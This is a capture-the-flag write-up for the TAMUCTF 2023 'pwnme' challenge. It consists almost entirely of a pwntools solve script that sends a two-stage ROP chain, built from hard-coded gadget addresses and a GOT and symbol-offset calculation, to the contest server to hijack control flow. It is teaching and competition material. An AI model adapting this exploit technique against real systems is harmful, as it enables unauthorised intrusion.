Pwnme
05/04/2023
By: unvariant
Tags: pwn TAMUCTF-2023
Problem Description:
pwn me. that's it.
Hints: None
Solve script
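from pwn import *

# Length every stage is padded to before it is sent. Taken from the original
# script's ljust()/assert; the size of the read on the remote side is not
# visible here -- confirm against the binary.
STAGE_LEN = 0x48

libp = ELF("./libpwnme.so")
file = ELF("./pwnme")
p = remote("tamuctf.com", 443, ssl=True, sni="pwnme")

# Gadget addresses in ./pwnme, as given in the original script.
pop_rdi = 0x40118b
pop_rsi_r15 = 0x401189
sub_rax_rsi = 0x4011b2
ldr_rax_rdi = 0x401191
call_rax = 0x401010  # not used by the chain below; kept for reference
jmp_rax = 0x40109c
ret = 0x401016
pop4 = 0x401184  # not used by the chain below; kept for reference


def send_stage(chain: bytes) -> None:
    """Pad one ROP stage to STAGE_LEN with NUL bytes and send it.

    The original script guarded only the first stage, and did so with
    ``assert``, which is stripped under ``python -O``; an explicit check
    applied to every stage catches an over-long chain before anything is
    written to the socket.

    Raises:
        ValueError: if ``chain`` is longer than STAGE_LEN.
    """
    if len(chain) > STAGE_LEN:
        raise ValueError(f"stage is {len(chain):#x} bytes, limit is {STAGE_LEN:#x}")
    p.send(chain.ljust(STAGE_LEN, b"\x00"))


# Stage 1: three qwords of filler, the address of main, a zero qword, then the
# ldr_rax_rdi / sub_rax_rsi / jmp_rax gadgets. Same bytes as the original.
stage1 = b"".join([
    p64(0) * 3,
    p64(file.symbols["main"]),
    p64(0),
    p64(ldr_rax_rdi),
    p64(sub_rax_rsi),
    p64(jmp_rax),
])
send_stage(stage1)

# Stage 2: filler, then pop_rsi_r15 with the distance between the two libpwnme
# symbols and a zero, pop_rdi with the GOT slot of pwnme, and a ret. What each
# gadget loads is inferred from its name only -- verify by disassembling.
stage2 = b"".join([
    p64(0) * 3,
    p64(pop_rsi_r15),
    p64(libp.symbols["pwnme"] - libp.symbols["win"]),
    p64(0),
    p64(pop_rdi),
    p64(file.got["pwnme"]),
    p64(ret),
])
send_stage(stage2)

p.interactive()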